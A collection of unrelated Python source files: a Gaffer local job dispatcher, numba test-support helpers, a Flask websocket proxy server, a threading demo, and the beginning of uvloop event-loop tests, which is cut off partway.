# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import os
import errno
import subprocess
import threading
import Gaffer
import IECore
class LocalDispatcher( Gaffer.Dispatcher ) :
def __init__( self, name = "LocalDispatcher" ) :
Gaffer.Dispatcher.__init__( self, name )
backgroundPlug = Gaffer.BoolPlug( "executeInBackground", defaultValue = False )
self.addChild( backgroundPlug )
def jobDirectory( self, context ) :
jobDirectory = Gaffer.Dispatcher.jobDirectory( self, context )
result = os.path.join( jobDirectory, "%06d" % self.__nextJobId( jobDirectory ) )
while True :
try :
os.makedirs( result )
break
except OSError, e :
if e.errno == errno.EEXIST :
result = os.path.join( jobDirectory, "%06d" % self.__nextJobId( jobDirectory ) )
continue
else :
raise e
return result
def _doDispatch( self, batch ) :
script = batch.requirements()[0].node().scriptNode()
context = Gaffer.Context.current()
scriptFileName = script["fileName"].getValue()
jobName = context.substitute( self["jobName"].getValue() )
jobDirectory = self.jobDirectory( context )
messageTitle = "%s : Job %s %s" % ( self.getName(), jobName, os.path.basename( jobDirectory ) )
tmpScript = os.path.join( jobDirectory, os.path.basename( scriptFileName ) if scriptFileName else "untitled.gfr" )
script.serialiseToFile( tmpScript )
if self["executeInBackground"].getValue() :
self.__preBackgroundDispatch( batch, messageTitle )
threading.Thread( target = IECore.curry( self.__backgroundDispatch, batch, tmpScript, messageTitle ) ).start()
else :
self.__foregroundDispatch( batch, messageTitle )
IECore.msg( IECore.MessageHandler.Level.Info, messageTitle, "Dispatched all tasks." )
def __foregroundDispatch( self, batch, messageTitle ) :
for currentBatch in batch.requirements() :
self.__foregroundDispatch( currentBatch, messageTitle )
if not batch.node() or batch.blindData().get( "dispatched" ) :
return
script = batch.node().scriptNode()
description = "executing %s on %s" % ( batch.node().relativeName( script ), str(batch.frames()) )
IECore.msg( IECore.MessageHandler.Level.Info, messageTitle, description )
batch.execute()
batch.blindData()["dispatched"] = IECore.BoolData( True )
def __preBackgroundDispatch( self, batch, messageTitle ) :
if batch.node() and batch.node()["dispatcher"]["local"]["executeInForeground"].getValue() :
self.__foregroundDispatch( batch, messageTitle )
else :
for currentBatch in batch.requirements() :
self.__preBackgroundDispatch( currentBatch, messageTitle )
def __backgroundDispatch( self, batch, scriptFile, messageTitle ) :
if batch.blindData().get( "dispatched" ) :
return
for currentBatch in batch.requirements() :
self.__backgroundDispatch( currentBatch, scriptFile, messageTitle )
if not batch.node() :
IECore.msg( IECore.MessageHandler.Level.Info, messageTitle, "Dispatched all tasks." )
return
script = batch.node().scriptNode()
taskContext = batch.context()
frames = str( IECore.frameListFromList( [ int(x) for x in batch.frames() ] ) )
cmd = [
"gaffer", "execute",
"-script", scriptFile,
"-nodes", batch.node().relativeName( script ),
"-frames", frames,
]
contextArgs = []
for entry in taskContext.keys() :
if entry != "frame" and ( entry not in script.context().keys() or taskContext[entry] != script.context()[entry] ) :
contextArgs.extend( [ "-" + entry, repr(taskContext[entry]) ] )
if contextArgs :
cmd.extend( [ "-context" ] + contextArgs )
IECore.msg( IECore.MessageHandler.Level.Info, messageTitle, " ".join( cmd ) )
result = subprocess.call( cmd )
if result :
IECore.msg( IECore.MessageHandler.Level.Error, messageTitle, "Failed to execute " + batch.node().getName() + " on frames " + frames )
batch.blindData()["dispatched"] = IECore.BoolData( True )
def _doSetupPlugs( self, parentPlug ) :
if "local" not in parentPlug :
localPlug = Gaffer.CompoundPlug( "local" )
parentPlug.addChild( localPlug )
parentPlug["local"].clearChildren()
foregroundPlug = Gaffer.BoolPlug( "executeInForeground", defaultValue = False )
parentPlug["local"].addChild( foregroundPlug )
def __nextJobId( self, directory ) :
previousJobs = IECore.ls( directory, minSequenceSize = 1 )
nextJob = max( previousJobs[0].frameList.asList() ) + 1 if previousJobs else 0
return nextJob
IECore.registerRunTimeTyped( LocalDispatcher, typeName = "Gaffer::LocalDispatcher" )
Gaffer.Dispatcher.registerDispatcher( "Local", LocalDispatcher() )
|
support.py
|
"""
Assorted utilities for use in tests.
"""
import cmath
import contextlib
import enum
import errno
import gc
import math
import platform
import os
import shutil
import subprocess
import sys
import tempfile
import time
import traceback
import io
import ctypes
import multiprocessing as mp
import warnings
from contextlib import contextmanager
import numpy as np
from numba import testing
from numba.core import errors, typing, utils, config, cpu
from numba.core.compiler import compile_extra, compile_isolated, Flags, DEFAULT_FLAGS
import unittest
from numba.core.runtime import rtsys
from numba.np import numpy_support
try:
import scipy
except ImportError:
scipy = None
enable_pyobj_flags = Flags()
enable_pyobj_flags.set("enable_pyobject")
force_pyobj_flags = Flags()
force_pyobj_flags.set("force_pyobject")
no_pyobj_flags = Flags()
nrt_flags = Flags()
nrt_flags.set("nrt")
tag = testing.make_tag_decorator(['important', 'long_running'])
_32bit = sys.maxsize <= 2 ** 32
is_parfors_unsupported = _32bit
skip_parfors_unsupported = unittest.skipIf(
is_parfors_unsupported,
'parfors not supported',
)
skip_py38_or_later = unittest.skipIf(
utils.PYVERSION >= (3, 8),
"unsupported on py3.8 or later"
)
skip_tryexcept_unsupported = unittest.skipIf(
utils.PYVERSION < (3, 7),
"try-except unsupported on py3.6 or earlier"
)
skip_tryexcept_supported = unittest.skipIf(
utils.PYVERSION >= (3, 7),
"try-except supported on py3.7 or later"
)
_msg = "SciPy needed for test"
skip_unless_scipy = unittest.skipIf(scipy is None, _msg)
_lnx_reason = 'linux only test'
linux_only = unittest.skipIf(not sys.platform.startswith('linux'), _lnx_reason)
_is_armv7l = platform.machine() == 'armv7l'
disabled_test = unittest.skipIf(True, 'Test disabled')
# See issue #4026, PPC64LE LLVM bug
skip_ppc64le_issue4026 = unittest.skipIf(platform.machine() == 'ppc64le',
("Hits: 'LLVM Invalid PPC CTR Loop! "
"UNREACHABLE executed' bug"))
try:
import scipy.linalg.cython_lapack
has_lapack = True
except ImportError:
has_lapack = False
needs_lapack = unittest.skipUnless(has_lapack,
"LAPACK needs SciPy 1.0+")
try:
import scipy.linalg.cython_blas
has_blas = True
except ImportError:
has_blas = False
needs_blas = unittest.skipUnless(has_blas, "BLAS needs SciPy 1.0+")
class CompilationCache(object):
"""
A cache of compilation results for various signatures and flags.
This can make tests significantly faster (or less slow).
"""
def __init__(self):
self.typingctx = typing.Context()
self.targetctx = cpu.CPUContext(self.typingctx)
self.cr_cache = {}
def compile(self, func, args, return_type=None, flags=DEFAULT_FLAGS):
"""
Compile the function or retrieve an already compiled result
from the cache.
"""
from numba.core.registry import cpu_target
cache_key = (func, args, return_type, flags)
try:
cr = self.cr_cache[cache_key]
except KeyError:
# Register the contexts in case for nested @jit or @overload calls
# (same as compile_isolated())
with cpu_target.nested_context(self.typingctx, self.targetctx):
cr = compile_extra(self.typingctx, self.targetctx, func,
args, return_type, flags, locals={})
self.cr_cache[cache_key] = cr
return cr
class TestCase(unittest.TestCase):
longMessage = True
# A random state yielding the same random numbers for any test case.
# Use as `self.random.<method name>`
@utils.cached_property
def random(self):
return np.random.RandomState(42)
def reset_module_warnings(self, module):
"""
Reset the warnings registry of a module. This can be necessary
as the warnings module is buggy in that regard.
See http://bugs.python.org/issue4180
"""
if isinstance(module, str):
module = sys.modules[module]
try:
del module.__warningregistry__
except AttributeError:
pass
@contextlib.contextmanager
def assertTypingError(self):
"""
A context manager that asserts the enclosed code block fails
compiling in nopython mode.
"""
_accepted_errors = (errors.LoweringError, errors.TypingError,
TypeError, NotImplementedError)
with self.assertRaises(_accepted_errors) as cm:
yield cm
@contextlib.contextmanager
def assertRefCount(self, *objects):
"""
A context manager that asserts the given objects have the
same reference counts before and after executing the
enclosed block.
"""
old_refcounts = [sys.getrefcount(x) for x in objects]
yield
new_refcounts = [sys.getrefcount(x) for x in objects]
for old, new, obj in zip(old_refcounts, new_refcounts, objects):
if old != new:
self.fail("Refcount changed from %d to %d for object: %r"
% (old, new, obj))
@contextlib.contextmanager
def assertNoNRTLeak(self):
"""
A context manager that asserts no NRT leak was created during
the execution of the enclosed block.
"""
old = rtsys.get_allocation_stats()
yield
new = rtsys.get_allocation_stats()
total_alloc = new.alloc - old.alloc
total_free = new.free - old.free
total_mi_alloc = new.mi_alloc - old.mi_alloc
total_mi_free = new.mi_free - old.mi_free
self.assertEqual(total_alloc, total_free,
"number of data allocs != number of data frees")
self.assertEqual(total_mi_alloc, total_mi_free,
"number of meminfo allocs != number of meminfo frees")
_bool_types = (bool, np.bool_)
_exact_typesets = [_bool_types, utils.INT_TYPES, (str,), (np.integer,),
(bytes, np.bytes_)]
    _approx_typesets = [(float,), (complex,), (np.inexact,)]
_sequence_typesets = [(tuple, list)]
_float_types = (float, np.floating)
_complex_types = (complex, np.complexfloating)
def _detect_family(self, numeric_object):
"""
This function returns a string description of the type family
that the object in question belongs to. Possible return values
are: "exact", "complex", "approximate", "sequence", and "unknown"
"""
if isinstance(numeric_object, np.ndarray):
return "ndarray"
if isinstance(numeric_object, enum.Enum):
return "enum"
for tp in self._sequence_typesets:
if isinstance(numeric_object, tp):
return "sequence"
for tp in self._exact_typesets:
if isinstance(numeric_object, tp):
return "exact"
for tp in self._complex_types:
if isinstance(numeric_object, tp):
return "complex"
for tp in self._approx_typesets:
if isinstance(numeric_object, tp):
return "approximate"
return "unknown"
def _fix_dtype(self, dtype):
"""
Fix the given *dtype* for comparison.
"""
# Under 64-bit Windows, Numpy may return either int32 or int64
# arrays depending on the function.
if (sys.platform == 'win32' and sys.maxsize > 2**32 and
dtype == np.dtype('int32')):
return np.dtype('int64')
else:
return dtype
def _fix_strides(self, arr):
"""
Return the strides of the given array, fixed for comparison.
Strides for 0- or 1-sized dimensions are ignored.
"""
if arr.size == 0:
return [0] * arr.ndim
else:
return [stride / arr.itemsize
for (stride, shape) in zip(arr.strides, arr.shape)
if shape > 1]
def assertStridesEqual(self, first, second):
"""
Test that two arrays have the same shape and strides.
"""
self.assertEqual(first.shape, second.shape, "shapes differ")
self.assertEqual(first.itemsize, second.itemsize, "itemsizes differ")
self.assertEqual(self._fix_strides(first), self._fix_strides(second),
"strides differ")
def assertPreciseEqual(self, first, second, prec='exact', ulps=1,
msg=None, ignore_sign_on_zero=False,
abs_tol=None
):
"""
Versatile equality testing function with more built-in checks than
standard assertEqual().
For arrays, test that layout, dtype, shape are identical, and
recursively call assertPreciseEqual() on the contents.
For other sequences, recursively call assertPreciseEqual() on
the contents.
For scalars, test that two scalars or have similar types and are
equal up to a computed precision.
If the scalars are instances of exact types or if *prec* is
'exact', they are compared exactly.
If the scalars are instances of inexact types (float, complex)
and *prec* is not 'exact', then the number of significant bits
is computed according to the value of *prec*: 53 bits if *prec*
is 'double', 24 bits if *prec* is single. This number of bits
can be lowered by raising the *ulps* value.
ignore_sign_on_zero can be set to True if zeros are to be considered
equal regardless of their sign bit.
abs_tol if this is set to a float value its value is used in the
following. If, however, this is set to the string "eps" then machine
precision of the type(first) is used in the following instead. This
kwarg is used to check if the absolute difference in value between first
and second is less than the value set, if so the numbers being compared
are considered equal. (This is to handle small numbers typically of
magnitude less than machine precision).
Any value of *prec* other than 'exact', 'single' or 'double'
will raise an error.
"""
try:
self._assertPreciseEqual(first, second, prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
except AssertionError as exc:
failure_msg = str(exc)
# Fall off of the 'except' scope to avoid Python 3 exception
# chaining.
else:
return
# Decorate the failure message with more information
self.fail("when comparing %s and %s: %s" % (first, second, failure_msg))
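    # Illustrative usage (comment only, an addition to the original class): with
    # prec='double' the comparison tolerates roughly one 53-bit ulp of error, so
    #     self.assertPreciseEqual(0.1 + 0.2, 0.3, prec='double')
    # passes, while the default prec='exact' fails for the same pair.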
def _assertPreciseEqual(self, first, second, prec='exact', ulps=1,
msg=None, ignore_sign_on_zero=False,
abs_tol=None):
"""Recursive workhorse for assertPreciseEqual()."""
def _assertNumberEqual(first, second, delta=None):
if (delta is None or first == second == 0.0
or math.isinf(first) or math.isinf(second)):
self.assertEqual(first, second, msg=msg)
# For signed zeros
if not ignore_sign_on_zero:
try:
if math.copysign(1, first) != math.copysign(1, second):
self.fail(
self._formatMessage(msg,
"%s != %s" %
(first, second)))
except TypeError:
pass
else:
self.assertAlmostEqual(first, second, delta=delta, msg=msg)
first_family = self._detect_family(first)
second_family = self._detect_family(second)
assertion_message = "Type Family mismatch. (%s != %s)" % (first_family,
second_family)
if msg:
assertion_message += ': %s' % (msg,)
self.assertEqual(first_family, second_family, msg=assertion_message)
# We now know they are in the same comparison family
compare_family = first_family
# For recognized sequences, recurse
if compare_family == "ndarray":
dtype = self._fix_dtype(first.dtype)
self.assertEqual(dtype, self._fix_dtype(second.dtype))
self.assertEqual(first.ndim, second.ndim,
"different number of dimensions")
self.assertEqual(first.shape, second.shape,
"different shapes")
self.assertEqual(first.flags.writeable, second.flags.writeable,
"different mutability")
# itemsize is already checked by the dtype test above
self.assertEqual(self._fix_strides(first),
self._fix_strides(second), "different strides")
if first.dtype != dtype:
first = first.astype(dtype)
if second.dtype != dtype:
second = second.astype(dtype)
for a, b in zip(first.flat, second.flat):
self._assertPreciseEqual(a, b, prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
return
elif compare_family == "sequence":
self.assertEqual(len(first), len(second), msg=msg)
for a, b in zip(first, second):
self._assertPreciseEqual(a, b, prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
return
elif compare_family == "exact":
exact_comparison = True
elif compare_family in ["complex", "approximate"]:
exact_comparison = False
elif compare_family == "enum":
self.assertIs(first.__class__, second.__class__)
self._assertPreciseEqual(first.value, second.value,
prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
return
elif compare_family == "unknown":
# Assume these are non-numeric types: we will fall back
# on regular unittest comparison.
self.assertIs(first.__class__, second.__class__)
exact_comparison = True
else:
assert 0, "unexpected family"
# If a Numpy scalar, check the dtype is exactly the same too
# (required for datetime64 and timedelta64).
if hasattr(first, 'dtype') and hasattr(second, 'dtype'):
self.assertEqual(first.dtype, second.dtype)
# Mixing bools and non-bools should always fail
if (isinstance(first, self._bool_types) !=
isinstance(second, self._bool_types)):
assertion_message = ("Mismatching return types (%s vs. %s)"
% (first.__class__, second.__class__))
if msg:
assertion_message += ': %s' % (msg,)
self.fail(assertion_message)
try:
if cmath.isnan(first) and cmath.isnan(second):
# The NaNs will compare unequal, skip regular comparison
return
except TypeError:
# Not floats.
pass
# if absolute comparison is set, use it
if abs_tol is not None:
if abs_tol == "eps":
rtol = np.finfo(type(first)).eps
elif isinstance(abs_tol, float):
rtol = abs_tol
else:
raise ValueError("abs_tol is not \"eps\" or a float, found %s"
% abs_tol)
if abs(first - second) < rtol:
return
exact_comparison = exact_comparison or prec == 'exact'
if not exact_comparison and prec != 'exact':
if prec == 'single':
bits = 24
elif prec == 'double':
bits = 53
else:
raise ValueError("unsupported precision %r" % (prec,))
k = 2 ** (ulps - bits - 1)
delta = k * (abs(first) + abs(second))
else:
delta = None
if isinstance(first, self._complex_types):
_assertNumberEqual(first.real, second.real, delta)
_assertNumberEqual(first.imag, second.imag, delta)
elif isinstance(first, (np.timedelta64, np.datetime64)):
# Since Np 1.16 NaT == NaT is False, so special comparison needed
if numpy_support.numpy_version >= (1, 16) and np.isnat(first):
self.assertEqual(np.isnat(first), np.isnat(second))
else:
_assertNumberEqual(first, second, delta)
else:
_assertNumberEqual(first, second, delta)
def run_nullary_func(self, pyfunc, flags):
"""
Compile the 0-argument *pyfunc* with the given *flags*, and check
it returns the same result as the pure Python function.
The got and expected results are returned.
"""
cr = compile_isolated(pyfunc, (), flags=flags)
cfunc = cr.entry_point
expected = pyfunc()
got = cfunc()
self.assertPreciseEqual(got, expected)
return got, expected
class SerialMixin(object):
"""Mixin to mark test for serial execution.
"""
_numba_parallel_test_ = False
# Various helpers
@contextlib.contextmanager
def override_config(name, value):
"""
Return a context manager that temporarily sets Numba config variable
*name* to *value*. *name* must be the name of an existing variable
in numba.config.
"""
old_value = getattr(config, name)
setattr(config, name, value)
try:
yield
finally:
setattr(config, name, old_value)
@contextlib.contextmanager
def override_env_config(name, value):
"""
Return a context manager that temporarily sets an Numba config environment
*name* to *value*.
"""
old = os.environ.get(name)
os.environ[name] = value
config.reload_config()
try:
yield
finally:
if old is None:
# If it wasn't set originally, delete the environ var
del os.environ[name]
else:
# Otherwise, restore to the old value
os.environ[name] = old
# Always reload config
config.reload_config()
def compile_function(name, code, globs):
"""
Given a *code* string, compile it with globals *globs* and return
the function named *name*.
"""
co = compile(code.rstrip(), "<string>", "single")
ns = {}
eval(co, globs, ns)
return ns[name]
def tweak_code(func, codestring=None, consts=None):
"""
Tweak the code object of the given function by replacing its
*codestring* (a bytes object) and *consts* tuple, optionally.
"""
co = func.__code__
tp = type(co)
if codestring is None:
codestring = co.co_code
if consts is None:
consts = co.co_consts
if utils.PYVERSION >= (3, 8):
new_code = tp(co.co_argcount, co.co_posonlyargcount,
co.co_kwonlyargcount, co.co_nlocals,
co.co_stacksize, co.co_flags, codestring,
consts, co.co_names, co.co_varnames,
co.co_filename, co.co_name, co.co_firstlineno,
co.co_lnotab)
else:
new_code = tp(co.co_argcount, co.co_kwonlyargcount, co.co_nlocals,
co.co_stacksize, co.co_flags, codestring,
consts, co.co_names, co.co_varnames,
co.co_filename, co.co_name, co.co_firstlineno,
co.co_lnotab)
func.__code__ = new_code
_trashcan_dir = 'numba-tests'
if os.name == 'nt':
# Under Windows, gettempdir() points to the user-local temp dir
_trashcan_dir = os.path.join(tempfile.gettempdir(), _trashcan_dir)
else:
# Mix the UID into the directory name to allow different users to
# run the test suite without permission errors (issue #1586)
_trashcan_dir = os.path.join(tempfile.gettempdir(),
"%s.%s" % (_trashcan_dir, os.getuid()))
# Stale temporary directories are deleted after they are older than this value.
# The test suite probably won't ever take longer than this...
_trashcan_timeout = 24 * 3600 # 1 day
def _create_trashcan_dir():
try:
os.mkdir(_trashcan_dir)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def _purge_trashcan_dir():
freshness_threshold = time.time() - _trashcan_timeout
for fn in sorted(os.listdir(_trashcan_dir)):
fn = os.path.join(_trashcan_dir, fn)
try:
st = os.stat(fn)
if st.st_mtime < freshness_threshold:
shutil.rmtree(fn, ignore_errors=True)
except OSError as e:
# In parallel testing, several processes can attempt to
# remove the same entry at once, ignore.
pass
def _create_trashcan_subdir(prefix):
_purge_trashcan_dir()
path = tempfile.mkdtemp(prefix=prefix + '-', dir=_trashcan_dir)
return path
def temp_directory(prefix):
"""
Create a temporary directory with the given *prefix* that will survive
at least as long as this process invocation. The temporary directory
will be eventually deleted when it becomes stale enough.
This is necessary because a DLL file can't be deleted while in use
under Windows.
An interesting side-effect is to be able to inspect the test files
shortly after a test suite run.
"""
_create_trashcan_dir()
return _create_trashcan_subdir(prefix)
def import_dynamic(modname):
"""
Import and return a module of the given name. Care is taken to
avoid issues due to Python's internal directory caching.
"""
import importlib
importlib.invalidate_caches()
__import__(modname)
return sys.modules[modname]
# From CPython
@contextlib.contextmanager
def captured_output(stream_name):
"""Return a context manager used by captured_stdout/stdin/stderr
that temporarily replaces the sys stream *stream_name* with a StringIO."""
orig_stdout = getattr(sys, stream_name)
setattr(sys, stream_name, io.StringIO())
try:
yield getattr(sys, stream_name)
finally:
setattr(sys, stream_name, orig_stdout)
def captured_stdout():
"""Capture the output of sys.stdout:
with captured_stdout() as stdout:
print("hello")
self.assertEqual(stdout.getvalue(), "hello\n")
"""
return captured_output("stdout")
def captured_stderr():
"""Capture the output of sys.stderr:
with captured_stderr() as stderr:
print("hello", file=sys.stderr)
self.assertEqual(stderr.getvalue(), "hello\n")
"""
return captured_output("stderr")
@contextlib.contextmanager
def capture_cache_log():
with captured_stdout() as out:
with override_config('DEBUG_CACHE', True):
yield out
class MemoryLeak(object):
__enable_leak_check = True
def memory_leak_setup(self):
# Clean up any NRT-backed objects hanging in a dead reference cycle
gc.collect()
self.__init_stats = rtsys.get_allocation_stats()
def memory_leak_teardown(self):
if self.__enable_leak_check:
self.assert_no_memory_leak()
def assert_no_memory_leak(self):
old = self.__init_stats
new = rtsys.get_allocation_stats()
total_alloc = new.alloc - old.alloc
total_free = new.free - old.free
total_mi_alloc = new.mi_alloc - old.mi_alloc
total_mi_free = new.mi_free - old.mi_free
self.assertEqual(total_alloc, total_free)
self.assertEqual(total_mi_alloc, total_mi_free)
def disable_leak_check(self):
# For per-test use when MemoryLeakMixin is injected into a TestCase
self.__enable_leak_check = False
class MemoryLeakMixin(MemoryLeak):
def setUp(self):
super(MemoryLeakMixin, self).setUp()
self.memory_leak_setup()
def tearDown(self):
super(MemoryLeakMixin, self).tearDown()
gc.collect()
self.memory_leak_teardown()
@contextlib.contextmanager
def forbid_codegen():
"""
Forbid LLVM code generation during the execution of the context
manager's enclosed block.
If code generation is invoked, a RuntimeError is raised.
"""
from numba.core import codegen
patchpoints = ['CodeLibrary._finalize_final_module']
old = {}
def fail(*args, **kwargs):
raise RuntimeError("codegen forbidden by test case")
try:
# XXX use the mock library instead?
for name in patchpoints:
parts = name.split('.')
obj = codegen
for attrname in parts[:-1]:
obj = getattr(obj, attrname)
attrname = parts[-1]
value = getattr(obj, attrname)
assert callable(value), ("%r should be callable" % name)
old[obj, attrname] = value
setattr(obj, attrname, fail)
yield
finally:
for (obj, attrname), value in old.items():
setattr(obj, attrname, value)
# For details about redirection of file-descriptor, read
# https://eli.thegreenplace.net/2015/redirecting-all-kinds-of-stdout-in-python/
@contextlib.contextmanager
def redirect_fd(fd):
"""
Temporarily redirect *fd* to a pipe's write end and return a file object
wrapping the pipe's read end.
"""
from numba import _helperlib
libnumba = ctypes.CDLL(_helperlib.__file__)
libnumba._numba_flush_stdout()
save = os.dup(fd)
r, w = os.pipe()
try:
os.dup2(w, fd)
yield io.open(r, "r")
finally:
libnumba._numba_flush_stdout()
os.close(w)
os.dup2(save, fd)
os.close(save)
def redirect_c_stdout():
"""Redirect C stdout
"""
fd = sys.__stdout__.fileno()
return redirect_fd(fd)
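# Illustrative usage sketch (an assumption, not part of the original helpers): capturing
# text printed by native code during a test.
#
#     with redirect_c_stdout() as fobj:
#         run_compiled_function_that_prints()  # hypothetical call emitting C-level output
#     captured = fobj.read()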
def run_in_new_process_caching(func, cache_dir_prefix=__name__, verbose=True):
"""Spawn a new process to run `func` with a temporary cache directory.
    The child process's stdout and stderr will be captured and redirected to
    the current process's stdout and stderr.
Returns
-------
ret : dict
        exitcode: 0 for success, 1 if an exception was raised.
stdout: str
stderr: str
"""
ctx = mp.get_context('spawn')
qout = ctx.Queue()
cache_dir = temp_directory(cache_dir_prefix)
with override_env_config('NUMBA_CACHE_DIR', cache_dir):
proc = ctx.Process(target=_remote_runner, args=[func, qout])
proc.start()
proc.join()
stdout = qout.get_nowait()
stderr = qout.get_nowait()
if verbose and stdout.strip():
print()
print('STDOUT'.center(80, '-'))
print(stdout)
if verbose and stderr.strip():
print(file=sys.stderr)
print('STDERR'.center(80, '-'), file=sys.stderr)
print(stderr, file=sys.stderr)
return {
'exitcode': proc.exitcode,
'stdout': stdout,
'stderr': stderr,
}
def _remote_runner(fn, qout):
"""Used by `run_in_new_process_caching()`
"""
with captured_stderr() as stderr:
with captured_stdout() as stdout:
try:
fn()
except Exception:
traceback.print_exc()
exitcode = 1
else:
exitcode = 0
qout.put(stdout.getvalue())
qout.put(stderr.getvalue())
sys.exit(exitcode)
class CheckWarningsMixin(object):
@contextlib.contextmanager
def check_warnings(self, messages, category=RuntimeWarning):
with warnings.catch_warnings(record=True) as catch:
warnings.simplefilter("always")
yield
found = 0
for w in catch:
for m in messages:
if m in str(w.message):
self.assertEqual(w.category, category)
found += 1
self.assertEqual(found, len(messages))
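# Illustrative sketch (an assumption, not part of the original module): how the helpers
# above are typically combined in a concrete test case.
#
#     class ExampleTest(MemoryLeakMixin, TestCase):
#         def test_addition(self):
#             with override_config('DEBUG_CACHE', True):
#                 self.assertPreciseEqual(np.float64(1.0) + np.float64(1.0), np.float64(2.0))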
|
run.py
|
import websocket, multiprocessing, os, warnings
from datetime import datetime, timedelta
from dateutil.parser import parse
from flask import Flask, Response, request
from flask_cors import cross_origin
from osmosis_streaming_driver.proxy_server.token_store import TokenStore
PROXY_SERVER_PORT = 3580 if 'PROXY_SERVER_PORT' not in os.environ else int(os.environ['PROXY_SERVER_PORT'])
PROXY_SERVER_HOST = 'localhost'
if 'PROXY_SERVER_HOSTNAME' in os.environ:
PROXY_SERVER_HOST = os.environ['PROXY_SERVER_HOSTNAME']
else:
import socket
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
PROXY_SERVER_HOST = s.getsockname()[0]
except Exception as e:
warnings.warn('Error while trying to obtain IP address of this host. %s' % str(e))
app = Flask(__name__)
store = TokenStore()
def _validate_stream_async(stream_url, q):
try:
ws = websocket.create_connection(stream_url)
ws.close()
except Exception as e:
print(e)
q.put((False, "Unable to connect to stream. Details: '%s'" % str(e)))
else:
q.put((True, ""))
def _validate_stream(stream_url, timeout_sec=5):
q = multiprocessing.Queue()
process = multiprocessing.Process(target=_validate_stream_async, args=(stream_url, q))
process.start()
process.join(timeout_sec)
if process.is_alive():
process.terminate()
return False, "Timeout while trying to connect to '%s'" % stream_url
success, err_message = q.get()
return success, err_message
@app.route('/token')
def get_token():
stream_url = request.args.get('stream_url', type=str)
expires_at_str = request.args.get('expires_at', type=str)
if stream_url is None:
return "You need to provide the URL of your stream.", 400
if expires_at_str is None:
return "You need to provide the expiration date.", 400
try:
expires_at = parse(expires_at_str)
    except Exception:
return f'Expect ISO format expiring date, got {expires_at_str}', 400
test_status, error_message = _validate_stream(stream_url)
if not test_status:
return error_message, 500
return store.register(stream_url, expires_at)
@app.route('/proxy')
@cross_origin()
def proxy_wss():
token = request.args.get('token', type=str)
if token is None:
return "You need to provide a valid token to start proxying.", 400
stream_url, expiration = store.get_token_attributes(token)
if stream_url is None:
return "Token '%s' is invalid. Please provide a valid token." % str(token), 401
ws = websocket.create_connection(stream_url)
def generate(webs):
while expiration > datetime.now():
yield webs.recv()
webs.close()
return Response(generate(ws), mimetype='text/plain')
@app.route('/info')
def info():
return store.dump(), 200
def start():
app.run('0.0.0.0', port=PROXY_SERVER_PORT)
def get_test_client():
return app.test_client()
if __name__ == '__main__':
start()
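# Usage sketch against the Flask test client; the stream URL and expiry are
# illustrative values only (the /token route will try to connect to the URL).
#
#     client = get_test_client()
#     token = client.get('/token?stream_url=ws://example.org/stream'
#                        '&expires_at=2030-01-01T00:00:00').get_data(as_text=True)
#     proxied = client.get('/proxy?token=%s' % token)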
|
PyThread.py
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
import time, threading
# Code executed by the new thread:
def loop():
    print('thread %s is running...' % threading.current_thread().name)
    n = 0
    while n < 5:
        n = n + 1
        print('thread %s >>> %s' % (threading.current_thread().name, n))
        time.sleep(1)
    print('thread %s ended.' % threading.current_thread().name)
print('thread %s is running...' % threading.current_thread().name)
t = threading.Thread(target=loop, name='LoopThread')
t.start()
t.join()
print('thread %s ended.' % threading.current_thread().name)
|
test_base.py
|
import asyncio
import fcntl
import logging
import threading
import time
import uvloop
import unittest
import weakref
from unittest import mock
from uvloop._testbase import UVTestCase, AIOTestCase
class _TestBase:
def test_close(self):
self.assertFalse(self.loop._closed)
self.assertFalse(self.loop.is_closed())
self.loop.close()
self.assertTrue(self.loop._closed)
self.assertTrue(self.loop.is_closed())
# it should be possible to call close() more than once
self.loop.close()
self.loop.close()
# operation blocked when the loop is closed
f = asyncio.Future(loop=self.loop)
self.assertRaises(RuntimeError, self.loop.run_forever)
self.assertRaises(RuntimeError, self.loop.run_until_complete, f)
def test_handle_weakref(self):
wd = weakref.WeakValueDictionary()
h = self.loop.call_soon(lambda: None)
wd['h'] = h # Would fail without __weakref__ slot.
def test_call_soon(self):
calls = []
def cb(inc):
calls.append(inc)
self.loop.stop()
self.loop.call_soon(cb, 10)
h = self.loop.call_soon(cb, 100)
self.assertIn('.cb', repr(h))
h.cancel()
self.assertIn('cancelled', repr(h))
self.loop.call_soon(cb, 1)
self.loop.run_forever()
self.assertEqual(calls, [10, 1])
def test_call_soon_base_exc(self):
def cb():
raise KeyboardInterrupt()
self.loop.call_soon(cb)
with self.assertRaises(KeyboardInterrupt):
self.loop.run_forever()
self.assertFalse(self.loop.is_closed())
def test_calls_debug_reporting(self):
def run_test(debug, meth, stack_adj):
context = None
def handler(loop, ctx):
nonlocal context
context = ctx
self.loop.set_debug(debug)
